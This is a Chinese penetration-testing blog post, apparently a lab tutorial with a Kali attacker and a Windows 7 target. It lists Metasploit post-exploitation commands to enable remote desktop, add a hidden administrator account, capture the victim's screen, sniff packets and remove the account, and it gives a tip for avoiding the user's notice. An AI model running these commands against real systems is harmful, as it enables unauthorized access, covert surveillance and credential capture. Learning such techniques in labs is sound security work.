当前位置:网站首页>内网渗透之内网信息收集(二)
内网渗透之内网信息收集(二)
2022-07-06 09:23:00 【不知名白帽】
目录
内网渗透之内网信息收集(三)_不知名白帽的博客-CSDN博客
Metasploit内网信息收集
攻击机 kali 192.168.0.103
靶机 win7 192.168.0.105
05打开并连接3389
查看3389端口的开放情况
开启3389远程桌面
run post/windows/manage/enable_rdp
run getgui -e
可以利用该命令在目标机器上添加用户:
run getgui -u admin -p [email protected](一些系统密码得满足复杂度才能创建)
net localgroup administrators admin /add(将admin用户添加到管理员组)
远程连接桌面
rdesktop -u username -p password ip
yes之后会弹出一个GUI页面(如果用户没有添加到管理员组不能进行登录)
登陆后会提示关闭win7(所以要提前观察靶机是否有人使用,以免被用户察觉到被攻击)
查看远程桌面
screenshot(截取win7当前屏幕,检查是否有人使用)
use espia
screengrab
screenshare(实时获取win7屏幕,类似于视频样式在浏览器中打开)
删除指定账号
run post/windows/manage/delete_user USERNAME=admin
06数据包抓取
抓包
Load sniffer
Sniffer_interfaces
Sniffer_start 2
Sniffer_dump 2 1.cap
解码
Use auxiliary/sniffer/psnuffle
Set PCAPFILE 1.cap
exploit
边栏推荐
- [data processing of numpy and pytoch]
- Experiment 9 input and output stream (excerpt)
- Which is more advantageous in short-term or long-term spot gold investment?
- 7-3 construction hash table (PTA program design)
- DVWA (5th week)
- Renforcer les dossiers de base de l'apprentissage
- [MySQL table structure and integrity constraint modification (Alter)]
- 7-14 error ticket (PTA program design)
- sqqyw(淡然点图标系统)漏洞复现和74cms漏洞复现
- TypeScript快速入门
猜你喜欢
Programme de jeu de cartes - confrontation homme - machine
Only 40% of the articles are original? Here comes the modification method
Canvas foundation 1 - draw a straight line (easy to understand)
Xray and burp linkage mining
网络基础详解
【VMware异常问题】问题分析&解决办法
Hackmyvm target series (7) -tron
Poker game program - man machine confrontation
"Gold, silver and four" job hopping needs to be cautious. Can an article solve the interview?
. How to upload XMIND files to Jinshan document sharing online editing?
随机推荐
HackMyvm靶機系列(3)-visions
Difference and understanding between detected and non detected anomalies
Implementation of count (*) in MySQL
Experiment 9 input and output stream (excerpt)
A complete collection of papers on text recognition
Poker game program - man machine confrontation
Experiment 4 array
Low income from doing we media? 90% of people make mistakes in these three points
2. First knowledge of C language (2)
JS several ways to judge whether an object is an array
7-5 staircase upgrade (PTA program design)
Middleware vulnerability recurrence Apache
[experiment index of educator database]
Analysis of penetration test learning and actual combat stage
Safe driving skills on ice and snow roads
Package bedding of components
1. Preliminary exercises of C language (1)
List and data frame of R language experiment III
. Net6: develop modern 3D industrial software based on WPF (2)
【黑马早报】上海市监局回应钟薛高烧不化;麦趣尔承认两批次纯牛奶不合格;微信内测一个手机可注册俩号;度小满回应存款变理财产品...